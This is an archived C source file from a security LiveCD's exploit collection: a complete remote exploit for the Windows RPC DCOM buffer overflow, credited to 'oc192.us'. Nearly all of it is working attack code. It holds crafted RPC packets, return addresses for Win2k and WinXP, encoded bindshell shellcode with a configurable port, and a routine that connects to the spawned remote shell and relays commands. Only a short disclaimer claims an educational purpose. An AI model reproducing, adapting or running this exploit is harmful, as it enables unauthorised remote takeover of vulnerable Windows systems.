home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / rpc / windows / oc192-dcom.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  17KB  |  428 lines

---

1. /* Windows 2003 <= remote RPC DCOM exploit
2.  * Coded by .:[oc192.us]:. Security
3.  *
4.  * Features:
5.  *
6.  * -d destination host to attack.
7.  *
8.  * -p for port selection as exploit works on ports other than 135(139,445,539 etc)
9.  *
10.  * -r for using a custom return address.
11.  *
12.  * -t to select target type (Offset) , this includes universal offsets for - 
13.  *    win2k and winXP (Regardless of service pack)
14.  *
15.  * -l to select bindshell port on remote machine (Default: 666)
16.  *
17.  * - Shellcode has been modified to call ExitThread, rather than ExitProcess, thus 
18.  *   preventing crash of RPC service on remote machine.
19.  * 
20.  *   This is provided as proof-of-concept code only for educational 
21.  *   purposes and testing by authorized individuals with permission to 
22.  *   do so.
23.  */
24.  
25. #include <stdio.h>
26. #include <stdlib.h>
27. #include <sys/types.h>
28. #include <sys/socket.h>
29. #include <netinet/in.h>
30. #include <arpa/inet.h>
31. #include <unistd.h>
32. #include <netdb.h>
33. #include <fcntl.h>
34. #include <unistd.h>
35.  
36. /* xfocus start */
37. unsigned char bindstr[]={
38. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
39. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
40. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
41. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
42. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
43.  
44. unsigned char request1[]={
45. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
46. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
47. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
48. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
49. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
50. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
51. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
52. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
53. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
54. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
55. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
56. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
57. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
58. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
59. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
60. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
61. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
62. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
63. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
64. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
65. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
66. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
67. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
68. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
69. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
70. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
71. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
72. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
73. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
74. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
75. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
76. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
77. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
78. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
79. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
80. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
81. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
82. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
83. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
84. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
85. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
86. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
87. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
88. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
89. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
90. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
91. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
92. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
93. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
94. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
95. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
96. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
97. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
98. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
99. ,0x00,0x00,0x00,0x00,0x00,0x00};
100.  
101. unsigned char request2[]={
102. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
103. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
104.  
105. unsigned char request3[]={
106. 0x5C,0x00
107. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
108. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
109. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
110. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
111. /* end xfocus */
112.  
113. int type=0;
114. struct
115. {
116.   char *os;
117.   u_long ret;
118. }
119.  targets[] =
120.  {
121.   { "[Win2k-Universal]", 0x0018759F },
122.   { "[WinXP-Universal]", 0x0100139d },
123. }, v;
124.  
125.  
126. void usage(char *prog)
127. {
128.   int i;
129.   printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n");
130.   printf("Usage:\n\n");
131.   printf("%s -d <host> [options]\n", prog);
132.   printf("Options:\n");
133.   printf("    -d:        Hostname to attack [Required]\n");
134.   printf("    -t:        Type [Default: 0]\n");
135.   printf("    -r:        Return address [Default: Selected from target]\n");
136.   printf("    -p:        Attack port [Default: 135]\n");
137.   printf("    -l:        Bindshell port [Default: 666]\n\n");
138.   printf("Types:\n");
139.   for(i = 0; i < sizeof(targets)/sizeof(v); i++)
140.     printf("    %d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
141.   exit(0);
142. }
143.  
144. unsigned char sc[]=
145.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
146.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
147.     "\x46\x00\x58\x00\x46\x00\x58\x00"
148.  
149.     "\xff\xff\xff\xff" /* return address */
150.     
151.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
152.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
153.  
154.     /* bindshell no RPC crash, defineable spawn port */
155.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
156.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
157.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
158.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
159.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
160.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
161.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
162.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
163.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
164.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
165.     "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
166.     "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
167.     "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
168.     "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
169.     "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
170.     "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
171.     "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
172.     "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
173.     "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
174.     "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
175.     "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
176.     "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
177.     "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
178.     "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
179.     "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
180.     "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
181.     "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
182.     "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
183.     "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
184.     "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
185.     "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
186.     "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
187.     "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
188.     "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
189.     "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
190.     "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
191.     "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
192.     "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
193.     "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
194.     "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
195.     "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
196.     "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
197.  
198. /* xfocus start */
199. unsigned char request4[]={
200. 0x01,0x10
201. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
202. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
203. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
204. };
205. /* end xfocus */
206.  
207. /* Not ripped from teso =) */
208. void con(int sockfd)
209. {
210.   char rb[1500];
211.   fd_set  fdreadme;
212.   int i;
213.  
214.   FD_ZERO(&fdreadme);
215.   FD_SET(sockfd, &fdreadme);
216.   FD_SET(0, &fdreadme);
217.  
218.   while(1) 
219.   {
220.     FD_SET(sockfd, &fdreadme);
221.     FD_SET(0, &fdreadme);
222.       if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
223.         if(FD_ISSET(sockfd, &fdreadme)) 
224.         {
225.           if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
226.           {
227.             printf("[-] Connection lost..\n");
228.             exit(1);
229.           }
230.             if(write(1, rb, i) < 0) break;
231.         }
232.  
233.         if(FD_ISSET(0, &fdreadme)) 
234.         {
235.           if((i = read(0, rb, sizeof(rb))) < 0)
236.           {
237.             printf("[-] Connection lost..\n");
238.             exit(1);
239.           }
240.            if (send(sockfd, rb, i, 0) < 0) break;
241.         }
242.            usleep(10000);
243.         }
244.         
245.         printf("[-] Connection closed by foreign host..\n");
246.  
247.         exit(0);
248. }
249.  
250. int main(int argc, char **argv)
251. {
252.     int len, len1, sockfd, c, a;
253.     unsigned long ret;
254.     unsigned short port = 135;
255.     unsigned char buf1[0x1000];
256.     unsigned char buf2[0x1000];
257.     unsigned short lportl=666; /* drg */
258.     char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
259.     struct hostent *he;
260.     struct sockaddr_in their_addr;
261.     static char *hostname=NULL;
262.  
263.     if(argc<2)
264.     { 
265.       usage(argv[0]);
266.     }
267.  
268.     while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
269.     {
270.       switch (c)
271.       {
272.         case 'd':
273.           hostname = optarg;
274.           break;
275.         case 't':
276.           type = atoi(optarg);
277.           if((type > 1) || (type < 0))
278.           {
279.             printf("[-] Select a valid target:\n");
280.               for(a = 0; a < sizeof(targets)/sizeof(v); a++)
281.               printf("    %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);              
282.               return 1;
283.           }
284.           break;
285.         case 'r':
286.           targets[type].ret = strtoul(optarg, NULL, 16);
287.           break;
288.         case 'p':
289.           port = atoi(optarg);
290.           if((port > 65535) || (port < 1))
291.           {
292.             printf("[-] Select a port between 1-65535\n");
293.             return 1;
294.           }
295.           break;
296.         case 'l':
297.           lportl = atoi(optarg);   
298.           if((port > 65535) || (port < 1))
299.           {
300.             printf("[-] Select a port between 1-65535\n");
301.             return 1;
302.           }
303.           break;
304.        default:
305.           usage(argv[0]);
306.           return 1;
307.       }
308.     }
309.  
310.     if(hostname==NULL)
311.     {
312.       printf("[-] Please enter a hostname with -d\n");
313.       exit(1);
314.     }
315.  
316.     printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
317.     printf("[+] Resolving host..\n");
318.  
319.     if((he = gethostbyname(hostname)) == NULL)
320.     {
321.       printf("[-] gethostbyname: Couldnt resolve hostname\n");
322.       exit(1);
323.     }
324.  
325.     printf("[+] Done.\n");
326.  
327.     printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n", 
328.               targets[type].os, hostname, port, lportl, targets[type].ret);
329.  
330.     /* drg */   
331.     lportl=htons(lportl);
332.     memcpy(&lport[1], &lportl, 2);
333.     *(long*)lport = *(long*)lport ^ 0x9432BF80;
334.     memcpy(&sc[471],&lport,4);
335.  
336.     memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);
337.  
338.     their_addr.sin_family = AF_INET;
339.     their_addr.sin_addr = *((struct in_addr *)he->h_addr);
340.     their_addr.sin_port = htons(port);
341.  
342.     if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
343.     {
344.         perror("[-] Socket failed");
345.         return(0);
346.     }
347.     
348.     if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
349.     {
350.         perror("[-] Connect failed");
351.         return(0);
352.     }
353.     
354.     /* xfocus start */
355.     len=sizeof(sc);
356.     memcpy(buf2,request1,sizeof(request1));
357.     len1=sizeof(request1);
358.     
359.     *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
360.     *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
361.     
362.     memcpy(buf2+len1,request2,sizeof(request2));
363.     len1=len1+sizeof(request2);
364.     memcpy(buf2+len1,sc,sizeof(sc));
365.     len1=len1+sizeof(sc);
366.     memcpy(buf2+len1,request3,sizeof(request3));
367.     len1=len1+sizeof(request3);
368.     memcpy(buf2+len1,request4,sizeof(request4));
369.     len1=len1+sizeof(request4);
370.     
371.     *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
372.     
373.  
374.     *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;  
375.     *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
376.     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
377.     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
378.     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
379.     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
380.     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
381.     /* end xfocus */
382.     
383.  
384.     if (send(sockfd,bindstr,sizeof(bindstr),0)== -1)
385.     {
386.             perror("[-] Send failed");
387.             return(0);
388.     }
389.     len=recv(sockfd, buf1, 1000, 0);
390.     
391.     if (send(sockfd,buf2,len1,0)== -1)
392.     {
393.             perror("[-] Send failed");
394.             return(0);
395.     }
396.     close(sockfd);
397.     sleep(1);
398.     
399.     their_addr.sin_family = AF_INET;
400.     their_addr.sin_addr = *((struct in_addr *)he->h_addr);
401.     their_addr.sin_port = lportl;
402.  
403.     if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
404.     {
405.         perror("[-] Socket failed");
406.         return(0);
407.     }
408.     
409.     if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
410.     {
411.         printf("[-] Couldnt connect to bindshell, possible reasons:\n");
412.         printf("    1:    Host is firewalled\n");
413.         printf("    2:    Exploit failed\n");
414.         return(0);
415.     }   
416.     
417.     printf("[+] Connected to bindshell..\n\n");
418.  
419.     sleep(2);
420.  
421.     printf("-- bling bling --\n\n");
422.  
423.     con(sockfd);
424.  
425.     return(0);
426. }
427.  
428.